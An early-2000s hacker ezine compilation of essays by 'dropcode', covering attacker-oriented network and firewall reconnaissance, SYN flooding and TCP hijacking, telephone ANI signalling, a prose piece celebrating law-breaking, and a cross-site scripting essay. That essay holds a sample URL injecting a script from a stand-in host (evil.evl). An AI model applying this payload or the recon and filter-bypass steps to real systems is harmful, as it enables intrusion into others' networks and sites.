Copy Link
Add to Bookmark
Report
Outbreak Presents
;MMMMM WMM MMW MMMMMMMM MMMMMMM SMMMMMMM MMMMMMM ZMMM; MM MMMi
@MM MMM MMM MMM MM MMa MMr SMM MM7 MM MM MM MM:MMM
MM MMM MMM MMM MM MMMMMMM SMMMMMM: MMMMMMM MM0 @MM MMMMMM
@MM MMM MMM MMM MM MM7 XMM SMM MM2 MM MMMMMMM MMM MM7
MMMMMMr 0MMMMM0 .MMZ MMMMMMMX MMM MMM MMMMMMM MMM MMM MMW MMM
MMMMMMM MMMMMMM MMMMMMMW MMMMMM MMMMMMMM MMM MMa MMMMMMMM MMMMMM
7MM MM; MM MMM MMM MMM 7; SMM MMMM MM MM MMM 7;
7MMMMMM MMMMMMW MMMMMMM MMMMM SMMMMMMX MM MM MM 7MM MMMMM
7MM . MM MMM MM@ MM 8MM SMM MM MMMM SMM MM 8MM
SMM MMr @MM MMMMMMM7 MMMMMM SMMMMMMM MM. 7MM, SMM MMMMMM
[ outbreak presents ]
[ dropcode ]
[ http://www.outbreakzine.tk ]
[ irc.spasm.org -- #outbreak ]
This is something we recently thought about doing. It's called
"Outbreak Presents." Every so often, we compile all the texts
written by one of our staff writers, and we release it in one
big file. So this time around we're presenting: dropcode.
He's a damn good writer. Very smart, and very technical. So we
all hope you enjoy his texts, and learn something as well.
You can view his official website at:
http://www.dropcode.tk
Stay tuned for the next issue of Outbreak Magazine coming out in
October.. if you want to submit articles for that issue e-mail
them to: kleptic@grex.org or download back issues at:
http://www.outbreakzine.tk
Enjoy!
- Outbreak Staff
ÜÜÜÜÜÜÜÜÜÜÜÜÜßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜßÜÜÜÜÜÜÜÜÜÜÜÜ
Üß ßÜ
Û [ 0] Editorial..............................Outbreak Staff Û
Û [ 1] Behind The Eyes of a Phreak............dropcode Û
Û [ 2] Network Reconnaissance.................dropcode Û
Û [ 3] A Sign of Weakness.....................dropcode Û
Û [ 4] PRE-dystopia...........................dropcode Û
Û [ 5] Automatic Number Identification........dropcode Û
Û [ 6] Firewall Recon.........................dropcode Û
Û [ 7] Responsibilities of Trusted Host.......dropcode Û
Û [ 8] GPS in Wireless Devices................dropcode Û
Û [ 9] Biometric Security Basics..............dropcode Û
ßÜ Üß
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
[video notice]
windows users: (win98 or higher) you can open these files in notepad,
and set your font to terminal, size 9. if you prefer console or
MS-DOS, then just open it in MS-DOS editor, making sure if you're
using windows that you hit ctrl+enter to make it full screen.
linux users: view in console using an editor such as joe, or use
less -R <filename>. x windows users can view by using a font such as
nexus, or the terminal.pcf font that fwaggle created but lost.
[legal notice]
all texts used in this magazine are submitted by various contributors
and to the best of our knowledge these contributors are the rightful
copyright owners. feel free to redistribute this magazine in it's
entirety, but you may not redistribute or reproduce parts of this
publication without express permission from the staff.
----------------------------------.
"I shall be telling this with a sigh
Somewhere ages and ages hence
two roads diverged in a wood and I
I took the one less traveled by
and that has made all the difference" -rf
----------------------------------.
The world we live in bores me... I think I'm going to move.
I've lived here long enough; amongst the masked.
Everyone has secrets, and they all masquerade about behind their sketchy output.
They create elaborate facades and pretty little pictures to show the world their normal.
Guilty concience?
I have a secret, but I don't hide it; I let it idle. Sometimes there's a trace of it
somewhere deep behind my eyes or in the corner of my mouth... Sometimes...
Its dangerous these days. Incriminating even, but... I don't hide it. I don't have to.
My concience is clear.
The laws I break do not infringe upon my morality. I'll elaborate.
The world we live in is really something else, you know, with all the evils.
That coupled with the awkwardness people feel towards my discontent with the
state and status quo of this brave new world, makes me feel infinitesimal,
erroneous. I swim against the tide, walk against the mob, and quietly
laugh at lemmings diving to there own degradation.
So I think I'm going to move... I've had a place picked out for awhile...
its nice there... The ratio's reversed, its still many versus few... but this time
the few are the elite and the many are the clumsy. Some would say thats not a difference
but, in your world ...its hard to see it.
This world is not my own... You've all been there. Most of you go there many times a
day. But you stick to the streets you know... and you never look around as you move,
you just keep staring at your destination. It takes too much effort to look around.
And its too dark to see...
Not me. I look. When its to dark to see, I look harder. I stare. I stare and stare until
I can just make it out and then I stare more... there... there it is... what is it? ah...
This is the sometimes, its in my eyes, and the corner of my mouth...
And then I reach my destination and try to tell the story of what I found... Apathy.
'So what? Thats not too interesting. Why would you look so hard to see something like that?'
Would you ever find it? even if you were staring? I didn't think so... I'm clever.
Clever.
The wonderment of this world can be summed up in the way it makes me feel. And I feel clever.
I laugh when you trip because you cannot find the culprit...
I laugh when you're lost because I know where you are...
and then, feeling clever, I found a wall.
oh sure... I could have paid the toll and went through the door... But .... why should I? he
never made whats passed that wall... He's just charging people to see it; and he's getting
alot more than his fair share. So I jumped over it. Yeah, it was hard... but the world just
got alot bigger... and now I know I'll never pay for it because he is of the many and I am
of the few, He is clumsy... and apathetic... and I laugh... I laugh...
And in outsmarting him... I've broken laws... but, my concience... is clean.
----------------------------------.
Vagueness was the dominant technique used in this prose peice. Very purposefully.
It speaks to those who take the time to listen. Listen...
----------------------------------.
Greets: [705], [780], [604]
-dropcode###########################################
##...network reconnaissance. -dropcode...##
###########################################
"know thy enemy..." -sun tzu, the art of war.
-----------------------------------------------------------------------
:: introduction ::
network reconnaissance involves gathering information dealing with your
targets network. though, often a gruling task, the information gleaned
with the simple techniques i will explain throughout this article will
allow an attacker to build a complete dossier against a target network.
using simple recon techniques an attacker can systematically reduce a
network from a mess of connected machines to a specific range of
domains, network blocks and ip addresses.
-----------------------------------------------------------------------
:: public database digging ::
there are generally three areas of important info that can be gleaned
from public databases related to the targets network, they are
registrar, domain and network.
registrar queries provide the attacker with specific whois / registrar
servers directly associated with the targets network. this is important
because these associated servers are where the next queries will be
directed.
in the following example, i will be performing a registrar query on
psuedo networks inc. from a bash shell. of course, the crsnic.net
server could be queried in other ways, the bash shell was only a
preference.
---
$ whois "psuedo."@whois.crsnic.net
psuedostuff.com
psuedosomethin.com
psuedo.net
psuedopsuedo.org
---
placing the . wildcard at the end of my search string forced the server
to return all occurances of psuedo in the crsnic.net database. we can
now dig deeper to determine which domain is the one we want. i would
guess that psuedo.net is our best chance.
---
$ whois "psuedo.net"@whois.crsnic.net
Domain Name: PSUEDO.NET
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: www.networksolutions.com
Name Server: DNS1.PSUEDO.NET
Name Server: DNS2.PSUEDO.NET
---
blamo. from that query we see that whois.networksolutions.com is the
server we should direct our next queries at.
the domain query will provide us with information relating to the
registrant, the domain name, admin, when the record was last updated
and the primary and secondary dns servers (also aquired from the
first query)
---
$ whois psuedo.net@whois.networksolutions.com
[whios.networksolutions.com]
Registrant:
Psuedo Networks, Inc. (PSUEDO-DOM)
123 nowhere ave.
Buttfsck, AZ 12345
Domain Name: PSUEDO.NET
Administrative Contact, Technical Contact, Zone Contact:
Rick, Slick [Network do0d] (SR924) slickrick@PSUEDO.NET
710-555-1234 (fax) 710-555-1235
Record last updated on 30-Mar-02.
Record created on 30-Mar-02.
Database last updated on 10-Mar-02.
Domain servers in listed order:
DNS1.PSUEDO.NET 10.10.10.1
DNS2.PSUEDO.NET 10.10.10.2
---
the word record refers to the information stored in the whois database.
if the record was created years ago and hasn't been updated, its quite
possible that the information in the record is out of date. but if
the update is recent we've aquired a wealth of information on our mark.
lastly, the network query. american registry of internet numbers [arin]
maintains actual network blocks and ownership information in a gorga-
massive database. we will use whois to query the arin database:
---
$ whois "Psuedo Networks."@whois.arin.net
[whois.arin.net]
Psuedo Networks (NETBLK) 10.10.10.0 - 10.50.129.255
---
a tighter search can be made using a netblock as our search string.
---
$ whois 10.10.10.0@whois.arin.net
[whois.arin.net]
Some Big Backbone (NETBLK NA-05BLK) 10.10.0.0 - 10.10.255.255
Psuedo Networks (NETBLK NA-10-10-10-) 10.10.10.0 - 10.50.129.255
---
basically, arin.net's database has given us a network block owned by
psuedo networks, inc. thereby providing the attacker with a basic map
of systems to target.
-----------------------------------------------------------------------
:: ping sweeping ::
ping sweeping is a very simple, but quite versatile technique used to
determine which ip's in a given network block are actually live
machines.
the basic concept is to ping a range of ip's, compiling a list of the
ones that respond. for instance, psuedo networks own a class c
netblock ranging from 10.10.10.0 to 10.50.129.255. at first glance this
seems likely to be a long gruling process, and often it is, especially
if you're mapping a larger class a type netblock. however, there is a
simple technique to quicken the process. there are a few programs out
that, instead of pinging each system subsequently, send out all the
pings at once and idle waiting for the replies. this speeds up the
process significantly.
generally, pinging a host sends an icmp echo packet (icmp type 0x08)
and waits for an icmp echo_reply packet (icmp type 0x00). this method
is sometimes erroneous due to the fact that acd's are often configured
to filter icmp packets. it is possible to use a similar method to see
if a system is alive called the tcp ping. this methed sends a tcp ack
to the system and waits for an rst, showing that the system is infact
alive.
gping/fping/hping are very handy *nix programs capable of ping sweeping
a network block.
-----------------------------------------------------------------------
:: traceroute/tracert ::
using traceroute it is possible to find firewalls, packet filtering
devices and other access control devices [acd] on the target network.
---
$ traceroute psuedo.net
traceroute to psuedo.net (10.10.10.1), 30 hops max, 40 byte packets
1 box1 (207.124.10.1) 5.133 ms 5.101 ms 5.111 ms
2 rtr1.bigbackbone.net (10.10.22.10) 40.103 ms 40.210 ms 41.122 ms
3 rtr2.bigbackbone.net (10.10.22.11) 43.123 ms 43.163 ms 43.211 ms
4 acd.bigbackbone.net (10.10.11.11) 45.533 ms 45.364 ms 47.164 ms
5 box.psuedo.net (10.10.10.1) 47.733 ms 47.103 ms 47.603 ms
---
generally, it is safe to assume that the last hop before an important
machine on the targets network is some form of acd on their isp's
network. this acd can be anything from a physical hardware firewall to
a simple packet filtering device or router. in the above example, hop
four is likely an acd.
traceroute generally uses udp packets by default allowing the user to
switch to icmp if they feel if necesary at the command line. (the
reverse is true for tracert users) often acd's will filter icmp
or udp packets and give you output such as:
---
$ traceroute psuedo.net
traceroute to psuedo.net (10.10.10.1), 30 hops max, 40 byte packets
1 box1 (207.124.10.1) 5.133 ms 5.101 ms 5.111 ms
2 rtr1.bigbackbone.net (10.10.22.10) 40.103 ms 40.210 ms 41.122 ms
3 rtr2.bigbackbone.net (10.10.22.11) 43.123 ms 43.163 ms 43.211 ms
4 acd.bigbackbone.net (10.10.11.11) 45.533 ms 45.364 ms 47.164 ms
5 * * *
6 * * *
---
it is possible that switching the type of packets traceroute/tracert
sends might bypass this form of acd filtering. also, it is possible to
use the -p switch to specify a starting udp port in conjunction with
the -S switch to stop port incrementation. generally, traceroute will
start at the port specified with -p and increment +1. with -S switch
you can specify a port and keep all packets sending there. for instance
udp port 53 handles dns queries. since most acd's allow inbound dns
queries, its very likely that if you point your traceroute to 53, it
will bypass the acd's filtering and allow you to see beyond the acd.
-----------------------------------------------------------------------
:: port scanning ::
once you have a list of operational systems on your targets network you
can begin looking for vulnerable services on each individual system.
this can be accomplished by connecting to every tcp/udp port on the
victims machine to determine which ports are set in listening state.
if a port is listening, there's a good chance that there is a service
daemon running on that machine handling connections to that port. and
if there's a daemon running, there's a chance that it's vulnerable.
for instance, http daemons, or webservers generally run on port 80. if
port 80 is listening, its quite likely that the target machine is
running a webserver.
-tcp full connection scan:
-------------------------
the most common type of port scan is the tcp full connection scan.
this type of scan completes a threeway handshake, syn, syn/ack, ack.
this method is easily detectable but, with this method it is possible
to grab the daemons banner which often includes the name and version
of the running service.
-tcp syn scan:
-------------
the tcp syn scan is a little more stealthy because a full connection
is never made. the downside is that with a syn scan banners cannot be
retrieved. however, an attacker can make an educated guess as to what
service is running on the port because all services have a default.
(httpd:80, ftpd:21, telnetd:23, smtpd:25, etc)
-tcp ack scan:
-------------
this method can help in determining what types of packets are filtered
by an acd. the tcp ack bit is set before the packet is sent to see if
the acd filters packets without this bit set.
-tcp fin scan:
-------------
fin packets are sent to the target system on every port subsequently.
all closed ports should reply with rst's according to the standards of
the tcp protocol.
-tcp xmas scan:
--------------
an advanced version of the fin scan, the xmas method sends fin, urg
and push packets also forcing rst's from all closed ports.
-tcp null scan:
--------------
a tcp null scan sends packets to the target machine with no bits set.
this forces all closed ports to respond with an rst.
-udp scan:
---------
the basic principal of a udp scan is that when no icmp port
unreachable msg is recieved, the port must be listening.
-----------------------------------------------------------------------
:: outro ::
well, thats about it for network recon. any questions or comments can
be emailed to me at uberego@hotmail.com ...
respect to: gr3p, rambo, adeamis, smurf, fork, smiley, antimatt3r,
gambiit, ocean, ech0. droptone: dood, it looks so much
better on me :P, abused: xoxoxxx, heather: can't we all
jus' get along? kleptic: don't give up on outbreak, dood
people need you. :) honeypot: i lub j0o.
... anyone I'm forgetting, meh. :)
EOF.
-----------------------------------------------------------------------
######################################################################
## a sign of weakness. -dropcode ##
######################################################################
----------------------------------------------------------------------
"a firm handshake shows strength in character.
a feeble handshake is a sign of weakness."
----------------------------------------------------------------------
the connection initiation process most commonly associated with
internet communication channeling is known as the threeway handshake
and is a standard of the transmition control protocol [TCP].
in this article we will look at a mock threeway handshake in detail,
explain the different types of data exchanged during the process and
discuss potential weaknesses in the protocol.
----------------------------------------------------------------------
the operative mechanism of the tcp protocol is a means of transmitting
data over a communication channel between two machines without any
physical connection.
the means instated by the tcp standard is a complex system of parsing
data into packets of a fixed size and routing them through a long
string of systems to there destination.
each packet has 'flag bits' which can be set or unset. set bits
express the function of the packet. for instance, the purpose of a
packet with the synchronize [SYN] bit set is to initiate a connection,
whereas the purpose of a packet with the finish [FIN] bit set is to
terminate an existing connection.
the threeway handshake is a simple exchange of three packets between
the client and the server.
there are three basic steps to the handshake. figure 1.0 below
illustrates a basic representation of the three steps in sequence.
<figure 1.0>
:: ________ ________
:: | |----->>----SYN---->>-----| |
:: | client |-----<<--SYN/ACK--<<-----| server |
:: |________|----->>----ACK---->>-----|________|
::
</figure 1.0>
Step 1: the client begins the handshake by sending a packet with the
SYN bit set to the server signifying that it wants to initiate
a connection.
Step 2: the server recieves the SYN packet and returns a packet with
both the SYN and ACK bits set signifying that it accepts the
connection request.
Step 3: the client completes the handshake by sending an ACK packet,
a packet with the ACK bit set.
client applications are assigned a port to use in connecting to a
server. generally client ports are between 1024 and 65535. this is
called the ephemeral or client range.
servers (or daemons for *nix/*nux'ers) are also assigned a port. where
clients use there port to connect to a remote server, a server uses
its assigned port to listen for connection requests. servers listen on
ports in the service range, between 1 and 1023.
lets say the client in figure 1.0 is a web browser and is attempting
to view a webpage hosted by the server. a more elaborate diagram will
give a better representation of the process.
<figure 2.0>
:: ____________ ____________
:: | client | .->-SYN->-. | server |
:: | .--|----' | | |
:: |1024 | |-<-SYN/ACK-<-. | | |
:: | to '--|----. | | | |
:: |65535 | | | | | |
:: |____________| | | | |____________|
:: | | | | '----|--. |
:: | | | '------|80| 1-1023 |
:: | | '--->-ACK->----|--' |
:: |____________| |____________|
::
</figure 2.0>
the SYN packet leaves the client system from a port in the ephemeral
range and reaches the server system on the standard service port for
http, 80. the serving system is running an http server (httpd)
that is listening on port 80 so, it recieves the connection request
and responds with a SYN/ACK. the client recieves that and returns an
ACK to finish the handshake. blamo.
----------------------------------------------------------------------
an important aspect of the threeway handshake was left out in the
examples above for simplicities sake. when the server recieves a SYN
packet and returns a SYN/ACK it also allocates memory reserved for
connections called connection resources. this is a cause for concern
because an attacker with access to raw sockets on his local machine
can manipulate the source address of the SYN packet which would
result in the following.
Step 1: the attacker sends a 'spoofed' SYN packet. this means the
source address of the packet has been altered, usually to a
random address. the 'source address' is the address of the
client machine and the only way the serving machine knows
where to send the SYN/ACK.
Step 2: the server recieves the SYN packet. it allocates connection
resources for buffers and other connection management purposes
and sends a SYN/ACK to the spoofed address. the connection is
now 'half-open' and will remain in this state until it
recieves an ACK packet, the connection terminates, or the
servers waiting state times out.
Step 3: if the spoofed address is an existing address with a working
machine, that machine will reply with an RST signifying that
it never requested a connection. But if there is no machine at
the spoofed address the packet will be discarded. after a
short time the server will assume that the SYN/ACK got lost
or dropped on the way and resend it.
Step 4: back to step 1. the second SYN packet will cause the server to
allocate more connection resources.
if the attacker sends enough SYN's to force the server to allocate all
available connection resources before the first half-open connection
times out, the server will have no way to accept any more connections.
even the valid ones.
it is also possible to bombard multiple machines with SYN packets all
spoofed to the same address. this will result in the machine at the
fraudulent address getting flooded with SYN/ACKS from multiple
machines of your choice. often the vicims logs will show them being
flooded by government or big corporation networks. *smirk*
when a SYN packet is sent it contains, in its header, an ISN or
initial sequence number. the SYN/ACK packet the server responds with
conntains the servers ISN. every packet thereafter contains psuedo-
randomly generated sequence numbers determined by the two ISN's
exchanged.
if the connection between the client and server can be sniffed it is
possible for an attacker to 'highjack' a tcp session by injecting
spoofed packets with the expected sequence numbers. Mitnick used
this attack, intermingled with the SYN flood explained earlier in his
well known attacks on Shimomura.
also, if a tcp session between a server and a trusted client is
sniffed by an attacker, the attacker can often 'replay' the initiation
part of the session to create a trusted connection between himself
and the server.
----------------------------------------------------------------------
well, thats about all the formalized bitching i can do in one phile.
if you have any questions email me at uberego@hotmail.com
greets: lexi, jenniebean, ramb0x, gr3p, kleptic, ex3mecut3 an digi.
thats it. thats all. bleh. if you're not on this list, you
obviously havn't shown me enough love. *taps toes* i'm waiting
######################################################################
## [PRE-dystopia -dropcode] ##
## there's no such thing as paranoia... just damn good thinkin' ##
######################################################################
----------------------------------------------------------------------
:: disclaimer :: withdrawal of responsibility
----------------------------------------------------------------------
i hereby disclaim all liability to, and warn all readers of, the
perils this text may inflict upon its readers.
the purpose and main function of a Government is to maintain social
and economical stability within their society. in order for this to
occur they must self-perpetuate at the cost of anything but there
objectives.
the path to social stability is often littered with means that would
be more than frowned upon by society if they could only see it in
clearer light. however, if a few individuals began noticing the
elements of stabalization deeply embedded into everyday life, they
would be a threat to the self-perpetuating power structure that is
our Government. and the elimination of a few individuals is an
infinitesimal perplexity in the grand scheme of political evolution.
nonetheless, i pray you understand that the notions expressed herein
are important and should be made as big as they can be. and lest we
perish, our legacy will forever be.
----------------------------------------------------------------------
:: explanation :: wtf?
----------------------------------------------------------------------
it's been a prevailing and repetitive scenario dating back hundreds of
thousands of years. societies reigned over by the highest caste of the
social hierarchy.
as far as history can tell, people have always followed leaders.
society has always had standards to split up people into different
catagories; knowns and unknowns, haves and havenots. but who sets
these standards? who determines, by what perogative, who has and who
has not? i can already hear the legions of readers echoing, 'the
individual...dual...ual...al...l...'
well, i'm here to tell you, friends: that is not entirely true.
this text will explain that Governments, as the ruling caste, have
and have had but two objectives: civilize and stabilize... at any
cost. even the cost of our civil liberties.
as i am not duly equiped to explain these concepts to there fullest,
i suggest those who are interested read George Orwell's 1984, Aldous
Huxley's Brave New World and Brave New World Revisited, Ray Bradbury's
Fahrenheit 451, Eugene Zamiatin's We and any other books in the
dystopian genre that you can find.
----------------------------------------------------------------------
:: american truths :: sharp contrasts
----------------------------------------------------------------------
when the Taliban attacks america, that is terrorism. when america
attacks the Taliban, that is retaliation. when the Taliban responds
with further attacks on our great nation, they are terrorizing again.
when we respond with further attacks on their nation, we're
retaliating again.
if you make a fuss over civilian casualties caused by the american
government, you are aiding in the dissemination of terrorist
propaganda. however, when civilians are killed by haters of our mighty
nation, the perpetrators are evil and those deaths are tragedies.
When they put bombs in cars and kill our people, they're uncivilized
killers. When we put bombs on missiles and kill their people, we're
upholding civilized values.
When they kill, they're terrorists. When we kill, we're striking
against terror.
----------------------------------------------------------------------
:: osama bin laden :: a beacon for animosity
----------------------------------------------------------------------
in the 80's, osama bin laden was a ruthless killer. he led attacks
against the soviets in an attempt to force them out of afghanistan.
the united states were a beneficiary of the war between osama's
followers and the soviet occupiers of afghanistan so america aided
osama's army with munitions and training. in the all american opinion,
osama was good.
in 2001, osama bin laden was a ruthless killer. thousands of american
citizens were murdered in cold blood at the hands of osama's zealous,
fanatic following. in the all american opinion, osama is evil.
in order for a civilization to exist, survive and prosper there must
be an organized stability of society. in order for this to be achieved
the ruling caste must hold a certain amount of control over the
people. in a society where the doctrines of the government are
declared and understood as democratic, the masses have a sense of
security in knowing that they have a voice, and they play a part. the
frightening truth is, osama is whatever our loving leader says he is.
----------------------------------------------------------------------
the american government declared this war and bush has described it as
intemporal without geographical bounds. and i fear.
greets.........gr3p.rambo.ex.klep.lexi.jennie.digi.smiley.anti.adeamis
--Automatic Number Identification (ANI). -dropcode. ::o4.o6.2oo2::---.
----------------------------------------------------------------------.
<rip src="www22.verizon.com/wholesale/glossary/">
--/
. "The number transmitted through the network that identifies the
. calling party. Technically, a Common Channel Interoffice
. Signaling (CCIS) parameter that refers to the number
. transmitted on an out-of-band basis through the SS7 signaling
. network identifying the calling party's telephone number. Also
. known as Calling Party Number (CPN)."
--\
</rip src="www22.verizon.com/wholesale/glossary/">
----------------------------------------------------------------------.
ANI is the standard in CCIS for passing the originators CPN
(telefone number) between LECs. Each individual LEC (local exchange
carrier, or central office) uses an out-of-band signalling method to
transfer the loop ID and routing codes.
----------------------------------------------------------------------.
I've yet to confirm whether the original implementation was infact
split into multiple classifications or not, but the 4 classes of ANI
rumoured to have existed in the beginning are as follows:
Level A: Contained only the NPA (area code) of the calling party.
Level B: Contained the NPA and City of the calling party.
Level C: Contained the NPA, City and the calling parties prefix, or
switching exchange.
Level D: La whole anchaloda. NPA-Nxx-xxxx/city.
whether this is fact or fable, since the implementation of SS7, every
LEC using the SS7 protocal forwards Level D ANI. A recent developement
in CLID (Calling Line IDentification), known as ANI II, makes use of
a two digit pair to identify the Class of Service, or type of line
the caller is using, ie. POTS, COCOT, Payfone, etc.
----------------------------------------------------------------------.
ANI accross an analog trunk is sent in the form of DTMF/MF signalling
tones. Though the syntax varies slightly between carriers, it is
generally similar to:
KP-[NPA]-Nxx-xxxx-i-ST
.---------.-------------.----------------------------.----------------.
|code.....|decode.......|notes.......................|dtmf/mf.........|
'---------'-------------'----------------------------'----------------'
|kp.......|key pulse....|seizes a trunk..............|11khz/17khz.....|
|[npa]....|area code....|long distance calls only....|n/a.............|
|Nxx-xxxx.|loop id......|calling party number, cpn...|n/a.............|
|i........|info digit...|identifies class of service.|n/a.............|
|st.......|start signal.|end of ANI info.............|15khz/17khz.....|
'---------'--------------'---------------------------'----------------'
|..........the information digit is sometimes sent after kp...........|
'---------------------------------------------------------------------'
ANI accross data trunks is sent as the header of a data packet. Due to
sketchy standards within the SS7 protocal, i was unable to include an
exact diagram of how these packets are formatted.
----------------------------------------------------------------------.
All Wide Area Telephone/Telecom Service, or WATS lines are put through
a WATS Serving Office (WSO). The WSO has equipment capable of reading/
logging ANI.
----------------------------------------------------------------------.
Operator assisted dialing does not always forward ANI with the
original CPN. Often the equipment used by the TSPS will forward the
call with an ANIF or ANI Fail substituting the originators number.
Enhancements in the Automatic Intercept System (or CCI's DAIS II)
makes it possible for an end office to flag a line generating an
unusually large amount of ANIFs.
----------------------------------------------------------------------.
Well, i guess thats about it for this file. i lub you savvy. sorry
bout the last one, you know you're mai favourite.
-dropcode######################################################################
## firewall detection, interrogation and penetration. -dropcode ##
######################################################################
intro.
on todays internet its rare to find a system that isn't behind some
type of firewall. be it a software based application gateway, a hard-
ware based packet filtering or logging gateway, or some type of acd,
firewalls are everywhere.
this text will cover various techniques to detect firewalls on the
target network, remotely determine the firewalls rulesets and map out
the internal network through the firewall.
detection.
the detection of a firewall on a target network is generally quite
simple. as the function of a firewall is to prohibit certain types
of data from passing beyond itself and into the internal network, they
can easily be discovered by monitoring an orchestrated data flow
between you and a target system.
detection with traceroute.
traceroute is a network administration tool used to map a route
between you and a destination box. by default it launches a UDP packet
with a low TTL, or time to live, flag set in the IP header. the
objective is to force an ICMP TIME_EXCEEDED response for every system
on the route. for instance, we start by sending a UDP packet to our
target host with a TTL of 1, it will reach the first system on the
route and timeout there. that first system will discard the packet and
send an ICMP TIME_EXCEEDED packet back to you. you'll then send
another UDP packet, but this time the TTL will be set to 2. it will
terminate on the second system and we'll recieve a TIME_EXCEEDED from
them. so on, et cetera, ad nauseum. thats the general idea, to be
technical the standard with traceroute is to send three probes with
the same TTL before the incrementation. also, every packet is sent
to one port higher then the preceeding packet. so, not only does the
TTL increment, but the port does as well.
now, that probably seemed like i was getting way off track, but as
you'll soon see its all relevant.
--
bash-2.05a$ traceroute 0.0.0.8
traceroute to 0.0.0.8 (0.0.0.8), 64 hops max, 40 byte packets
1 0.0.0.2 (0.0.0.2) 0.630 ms 0.470 ms 0.413 ms
2 0.0.0.4 (0.0.0.4) 1.599 ms 1.505 ms 1.809 ms
3 0.0.0.6 (0.0.0.6) 1.759 ms 1.714 ms 2.847 ms
4 * * *
--
for some reason, the machine on hop 4 failed to return an ICMP
TIME_EXCEEDED. theres a good chance that this box is a firewall
filtering incoming UDP (or outgoing ICMP?). in either case, we've
probably found a firewall :).
for windows users, the microsoft implementation of traceroute,
tracert uses ICMP by default.
of course, traceroute/tracert isn't the only way to find a firewall.
there are many ways, often if an ICMP ECHO_REQUEST (ping) returns no
ECHO_REPLY its because theres a firewall filtering icmp (note:
this doesn't apply to users on dalnet *smirk*). there are plenty
more tools that can be used in firewall detection, but i'll leave
that to your imagination.
interrogation.
interrogation is the process of remotely determining the rulebase of
a firewall systematically.
in the previous section we have already done a bit of basic
interrogation. we know that the firewall at hop 4 filters either
incoming UDP or outgoing ICMP on at least the port we connected
to, which is unknown to us. using traceroutes -p attribute we can
specify a port to start at and determine if any ports allow UDP. a
good place to start looking is DNS (port 53) since some DNS transfers
require UDP theres a good chance it will allow UDP packets through
this port.
since traceroute increments the destination port for each packet we
need to do a bit of math. there are three packets for each hop and
4 hops till we reach the firewall. so the port to start at will be
53 - (4 * 3) - 1 giving us 40.
--
bash-2.05a$ traceroute -p40 0.0.0.8
traceroute to 0.0.0.8 (0.0.0.8), 64 hops max, 40 byte packets
1 0.0.0.2 (0.0.0.2) 0.630 ms 0.470 ms 0.413 ms
2 0.0.0.4 (0.0.0.4) 1.599 ms 1.505 ms 1.809 ms
3 0.0.0.6 (0.0.0.6) 1.759 ms 1.714 ms 2.847 ms
4 0.0.0.8 (0.0.0.8) 1.831 ms 1.918 ms 1.303 ms
--
we now know that the firewall allows UDP to pass through port 53 :)
hping and firewalk are two of the most important tools needed
for successful firewall interogation. firewalk is a console app
used to check for open ports on a firewall. it sends data to a live
system behind the firewall on various ports to see what is allowed.
hping is a tool for pinging remote systems, but it has alot of nice
attributes for playing with different parts of the actual tcp
packets. sometimes you can change a few of the features of a packet
and a firewall will let it through. hping also gives you the option
of fragmenting packets. this means that the packet will be split into
more than one packet. most firewalls nowadays have handlers for
fragmentation, but you may find one that doesn't recognize the
packets and lets them through.
now nmap. as important as firewalk and hping are, nmap owns them both
hands down. it is the single most important tool in your armoury.
ports scanned with nmap will output filtered when there is
no SYN/ACK or RST/ACK recieved from the destination. if nmap outputs
unfiltered it means we recieved an RST/ACK which means our packets
are passing through the firewall but the destination machine isn't
listening on the destination port.
penetration.
using the methods above, it is possible to map out the network behind
a firewall. similar to ping sweeping, only every packet sent is care-
fully formatted so to not be blocked by the firewall.
--
well thats about all for this text. if anyone has any questions, try
me at uberego@hotmail.com. regular greets to my bestest phrends:
kleptic, ramb0x, gr3p, jenny, lexi, oj, smiley, dirv, adeamis.
and two my newest phrends: |arry, turb. and anyone i forgot.
sav, i love you.
ps. maybe someday i'll be as hardcore as failure. *throws fone at
wall* till then, i'll keep practicing.
-dropcode######################################################################
########### responsibilities of trusted hosts -dropcode ############
######################################################################
just as in real life, here on the internet we mustn't make the
assumption that we can fall vitcim only to our own insecurities.
often, it is the insecurities of others that target us as victims.
what follows is the opinion of the writer and does not necessarily
reflect the opinions of the publisher, however it might... and
probably should. *smirk*
a certain class of vulnerability, known as cross-site scripting, has
been increasingly potent on the internet over the last two years.
since its original recognition by CERT in February of 2ooo cross-site
scripting vulnerabilities have surfaced in thousands of websites all
accross the web.
cross-site scripting takes advantage of weak verification procedures
when dynamically constructing webpages containing user-entered data.
this vulnerability makes it possible to embed malicious code into
websites with poorly written cgis.
----------------------------------------------------------------------
<a href="http://trustedhost.com/guestbook.cgi? comment=
<script src='!!!</a">http://evil.evl/evilcode'></script>">!!!</a>
----------------------------------------------------------------------
the attack itself is simple, the solution to the problem is simple,
but the implications and impact of the vulnerability are tremendous.
simply passing malicious code as an attribute to a vulnerable cgi
will cause the user to inadvertently execute the code.
for those having trouble grasping this, consider the following. sure,
malicious code has been a problem for promiscuous websurfers for as
long as malicious coders have been making webpages, but when malicious
code can be embeded into webpages that are trusted by even the most
wary websurfers, thats when it becomes epidemic.
cross-site scripting vulnerabilities have been found on some of the
most widely trusted hosts on the internet. Microsoft, NBC, Lycos,
Excite, CNet, Netscape, Ebay, and plenty more.
now, imagine visiting a site with as much credibility as those listed
above and coming away from it with a virus. where does the blame go?
considering the amount of dependency people put on personal computers,
and the amount of traffic generated by sites so credible, compensation
for loss is probably very daunting in the eyes of the organizations
who own those websites, and whos weak programming was exploited. this
is probably why they always use the malicious coders as the scapegoat.
don't get me wrong, of course those putting malicious code into effect
should be held responsible for the damage they cause, but i also feel
that a certain amount of responsability comes with self-promoted
credibility. after all, the damage could have been easily avoided had
their cgis filtered the certain tags.
i suppose the only real purpose this text has is to educate the
audience of the great injustice presented when large organizations
can mass-promote themselves, and not take responsibility when their
insecurities victimize people.
*shrugs* i guess thats big business.
----------------------------------------------------------------------
greets go to savvyD, ramb0x, gr3p, kleptic, digi, dirv, jenny, lexi,
lenny, turb, oj, smiley, snad... anyone i'm forgettin,
sorry.
----------------------------------------------------------------------######################################################################
#### Developement of Location Determination on Wireless Networks. ####
######################################################################
Intro.
----------------------------------------------------------------------
In the last two years wireless technology, as well as technology based
on wireless communications has seen alot of ground-breaking
developements. To anyone with a bit of well grounded foresight, it
isn't very difficult to envision a future bare of data carrying cables
altogether.
